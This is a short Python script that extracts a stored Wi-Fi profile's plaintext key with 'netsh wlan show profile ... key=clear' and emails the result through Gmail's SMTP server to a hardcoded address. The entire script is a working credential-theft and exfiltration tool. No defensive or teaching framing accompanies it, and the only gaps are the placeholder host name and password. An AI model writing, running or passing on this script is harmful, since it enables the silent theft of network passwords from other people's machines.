import subprocess, smtplib

def send_mail(email,password,message):
    server = smtplib.SMTP_SSL("smtp.gmail.com", 465)
    server.login(email,password)
    server.sendmail(email, email ,message)
    server.quit()


cmd = "netsh wlan show profile {insert wlan host} key=clear"

result = subprocess.check_output(cmd, shell = True)

send_mail("vicrontest@gmail.com","app-password generated by gmail", result)

